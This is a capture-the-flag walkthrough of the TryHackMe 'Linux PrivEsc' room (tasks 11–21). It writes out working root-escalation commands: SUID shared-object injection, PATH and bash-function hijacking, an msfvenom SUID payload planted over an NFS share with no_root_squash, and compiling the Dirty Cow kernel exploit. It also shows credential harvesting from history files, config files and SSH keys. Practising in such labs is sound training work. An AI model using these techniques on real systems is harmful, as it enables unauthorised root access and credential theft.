TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)

5/5 - (2 votes)


TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)
  • CTF Creator: Tib3rius
  • Link:
  • Difficulty: medium 
  • Target: gaining root access using a variety of different techniques
  • Highlight: Rooting a Linux machine using the famous Dirty Cow Kernel Exploit.
  • Tags: privesc, linux, privilege escalation


Welcome back to part II of this Linux privilege escalation series. You can find part 1 of this mini-series here:

👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)

In this tutorial, we’ll try some additional “magical” methods of gaining root access in tasks 11-21. Buckle in, and let’s get to it!

TASK 11 – SUID/SGID Executables

After making sure that we have connected to the TryHackMe VPN with OpenVPN, let’s go ahead and search for all files that have a SUID or SGID bit:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Let’s check out the exim 4.84-3 on to see if there are any known vulnerabilities. There is!

To make this faster, TryHackMe has already preloaded our machine with the exploit file. Let’s execute it and see if we can grab root!

TASK 12 – SUID / SGID Executables – Shared Object Injection 

In this privesc method we will use strace to search for libraries with no such file error when running the suid-so binary.

The file should exist in the /home/user/.config/ directory, but it is apparently missing. Let’s compile the included c file into that location with the command:

gcc -shared -fPIC -o /home/user/.config/ /home/user/tools/suid/libcalc.c

Now when we run the suid-so binary it should spawn a root shell.

TASK 13 – SUID / SGID Executables – Environment Variables

We’ll run strings to see a little more about the inner workings of the suid-env file. 

strings /usr/local/bin/suid-env

We can see that the final step in this program is to start an apache2 service. We can hijack this service by compiling a spoofed program with the same name that spawns a bash shell. 

gcc -o service /home/user/tools/suid/service.c

Finally, we need to modify the PATH variable with our current directory prepended in order to allow our spoofed service file to run.

PATH=.:$PATH /usr/local/bin/suid-env

TASK 14 – SUID / SGID Executables – Abusing Shell Features (#1) 

In this task, we will exploit the suid-env2 executable’s full path. In bash versions < 4.2-048 it is possible to create shell functions with filenames that appear to be full paths and also to export them to be used instead of the actual executables.

First, let’s check our bash version:

/bin/bash --version

And now, let’s create a Bash function with the name “/usr/sbin/service” that will spawn a new Bash shell with persistence mode turned on.

function /usr/sbin/service { /bin/bash -p; }

And last but not least, let’s export this new function and run the executable to get our root shell!

export -f /usr/sbin/service

TASK 15 – SUID / SGID Executables – Abusing Shell Features (#2)

We’ll exploit another shell function that works on Bash versions 4.4 and above. This time we’ll exploit the debugging mode’s ability to spawn an extra prompt for debugging statements.

In the env command, we ask the debugging shell to run a command to copy /bin/bash to a new file /tmp/rootbash and to give that file +xs permissions to let us execute and become root on the new shell.

TASK 16 Passwords & Keys – History Files 

This is my favorite method in this whole list because of the simplicity of the hack.

We scan all hidden bash history files and view them with less to search for passwords that may have been saved as plaintext. We find a MySQL password for root and can easily switch users to root.

TASK 17 Passwords & Keys – Config Files

In this task, we examine an ovpn file to see if there are any references to a file holding credentials. We find them without much trouble!

TASK 18 – Passwords & Keys – SSH Keys 

In this task, I’ll identify and copy a hidden ssh key from the target machine.

Next, over on my Kali attackbox, we paste the contents into a new file and change permissions to 600 before SSHing our way into the target machine as root!


In this task, we’ll exploit the network file system by mounting it to our attackbox and changing permissions. First, let’s cat out /etc/exports to see what is mountable and which permissions we might be able to exploit.

And here we see the infamous exploitable “no_root_squash”!

👉 Recommended: For further reading on exploiting the no_root_squash permissions on NFS, check out Hacking Network File System (NFS) – A TryHackMe Walkthrough

First, let’s create a new mount point at /tmp/mount on our attack machine.

mkdir /tmp/mount

Now let’s mount the NFS folder.

mount -o rw,vers=3 /tmp/nfs

Let’s create a malicious payload with msfvenom and place it in the NFS directory.

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

Now let’s add SUID permissions so that we can spawn a root shell.

chmod +xs /tmp/nfs/shell.elf

The last step is to switch back to the target machine and run the elf file to gain a root shell.


TASK 20 – Kernel Exploits 

In the final task, we will find a known kernel exploit and run it to gain root access. Let’s start out by running the Linux exploit suggester 2 script to help us identify potential exploits.

We’ll move ahead with option 3, the dirty_cow exploit. Let’s compile it from the files already conveniently located on my machine.

gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w

And now we can run it and gain a root shell.


TASK 21 – Privilege Escalation Scripts

The three scripts for Linux privesc located on this machine are: 


A full comparison of these scripts is out of the scope of this tutorial. If you’d like to see a detailed side-by-side analysis, please let me know, and I’ll add it to my list of future blog ideas.


Thanks for reading this write-up!

I’ve enjoyed trying out all of the different ways to privesc to root on Linux machines. It leaves me questioning my assumption that Linux machines are more secure than Windows or Mac machines.

It also reaffirms the importance of keeping operating systems up to date.